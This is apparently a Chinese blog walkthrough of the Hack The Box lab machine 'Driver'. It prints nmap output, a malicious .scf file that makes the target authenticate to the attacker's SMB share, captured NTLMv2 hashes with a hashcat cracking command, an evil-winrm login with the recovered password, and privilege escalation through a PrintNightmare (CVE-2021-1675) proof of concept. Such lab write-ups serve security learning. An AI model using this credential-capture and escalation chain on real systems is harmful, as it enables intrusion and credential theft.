HTB靶机 :Driver

前言:这台靶机是一台被遗忘的靶机,直到我发现它的时候已经快一个月了,但是它的环境的还开得,所以尝试 的打一下。这个靶机很有意思,我也第一次感受到“坐车”的便捷。我也发现一款很好用的渗透攻击:evil-winrm(这台msf弹不回shell,下文我会解释为什么msf打不通。)

image-20211031094014235

常规思路打一波:

1.信息收集

nmap扫一下靶机开放的端口

nmap -sC -sV 10.10.11.106

image-20211031094320779

Nmap scan report for 10.10.11.106
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h15m09s, deviation: 0s, median: 7h15m09s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-31T08:57:29
|_  start_date: 2021-10-30T19:33:00

开放的80和445的web端口,我们访问之:
第一次访问会弹出账号密码验证,我们可以靠猜解一波,如果猜不出来我们就该尝试爆破了,不过这台机器账号密码都是: admin

image-20211031094541882

这里我们首先使用对于这个网站进行查看:

image-20211031103757966

发现上传点,再尝试各种木马后发现,既没有目录回显,而且没有任何反弹shell,这里网上搜了一下,发现可能是SMB服务
参考文章:https://www.hackingarticles.in/smb-penetration-testing-port-445/
我们首先验证一下我们的猜想
nmap -p 445 -A 10.10.11.106

image-20211031104422377

我们从网上搜索以下如何面对SMB服务时的思路

image-20211031104644319

image-20211031110306358

image-20211031110316322

不过在尝试后发现我的本地打不通

image-20211031110350179

重新找方法,发现能上传,那么就尝试回到原来的思路,通过上传来获取到shell,这里是上传固件,那么我们换着花样给他上传。

image-20211031111030517

通过搜索发现可以通过上传 .scf文件来获取到NTLM的返回hash

https://zhidao.baidu.com/question/2250148.html

https://www.jianshu.com/p/a210528f9b35

https://zhuanlan.zhihu.com/p/110454024

image-20211031110604343

[Shell]
Command=2
IconFile=\\10.10.14.131\share\test.ico
[Taskbar]
Command=ToggleDesktop

image-20211031111253704

上传这个文件的同时我们本地开启响应服务:
sudo responder -wrf --lm -v -I tun0

image-20211031111449869

我们这里接收到以下hash

image-20211031111525929

SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:6189f8ac2073a6fe:859C9D1556CFD8A61B6B1CDC3E36BFA4:01010000000000008D6E01A1C5CDD70180563C024537E7C50000000002000400270027000000000000000000                                                     
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:e3f0cf589445d485:0E13EAE7E50AC7E57215575E3F41F1CF:01010000000000000853A8A1C5CDD701977E9CC2DAF2E3070000000002000400270027000000000000000000                                                     
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:6f4c38be65bdfc9c:71E044486B45D194823A9AFABB3B8C55:010100000000000012807FA4C5CDD7014C60AE2C7B683DFB0000000002000400270027000000000000000000                                                     
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:0d1e8ed45e8068af:7005FF5B6836CD9E3D6B936A6EB3ED7E:010100000000000036CFEDA6C5CDD701CB140A6780EDC5460000000002000400270027000000000000000000                                                     
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:d619c3d086367a96:0A2ADEDE82994625B2E1FA3EE10D396A:010100000000000017E3ECA7C5CDD7018F2F368BDF236E8E0000000002000400270027000000000000000000                                                     
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:990b2039961871d7:85872AB1DE09F9EACA5DC8E0A33945E5:0101000000000000A7DB87A8C5CDD70174BB7D05A843B8BB0000000002000400270027000000000000000000                                                     
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:c658670b23177f25:25608D073C2911EAD6F89772F72EAD61:0101000000000000503625A9C5CDD701175CF9786E276D150000000002000400270027000000000000000000
这里针对NTLMv hash的破解,我建议使用hashcat这款工具。

https://blog.csdn.net/smli_ng/article/details/106111493

hashcat -m 5600 tony::DRIVER:6189f8ac2073a6fe:859C9D1556CFD8A61B6B1CDC3E36BFA4:01010000000000008D6E01A1C5CDD70180563C024537E7C50000000002000400270027000000000000000000 /usr/share/wordlists/rockyou.txt  --force

image-20211031111917071

这里我们已经获取到该用户的账号密码:tony:liltony
但是没有开启22端口,没法使用ssh进行连接,我们这里 选取一款新的工具:Evil-Winrm

https://www.pianshen.com/article/14041459097/

https://www.freebuf.com/sectool/210479.html

evil-winrm -i 10.10.11.106 -u tony -p liltony

image-20211031112503911

到这里我们已经进入这台机器:

image-20211031112922076

提权:

我们首先查看这台机器种有什么文件,我们发现有人已经上传了提权检查工具winPEAS.exe,那这里我们就不客气了。

https://github.com/carlospolop/PEASS-ng

https://github.com/Fa1c0n35/winPEAS

image-20211031113429738

运行过后我们可以通过查看系统进程来进一步提权,这里发现一个spoolsv.打印服务,到现在确定这是一台暴露在公网上的打印机。

image-20211031113637964

我们去网上搜索关于它的poc

https://github.com/calebstewart/CVE-2021-1675

image-20211031113955091

我们可以将该poc上传至这台电脑中,这里我发现已经有前辈帮我们上传上来了,我们只需要执行和连接即可。

https://www.xpshuai.cn/posts/54938/

image-20211031114258265

这里我们使用连接一下,

image-20211031114421656

这个poc是直接将新增的用户添加到管理组,因此我这里已经算提权成功。
我们只需要切换到Administrator目录下即可读取到root.txt
由于道友重置了靶机,因此我们这里没事后截图。

总结:

这台靶机显示的简单,但是对于我来说并不简单,可能我太菜了吧。

这个对我最大的启发就是如何利用打印机这些设备进入机器中,针对不同的端口服务去使用不同的手法。学到了很多。

image-20211031093325754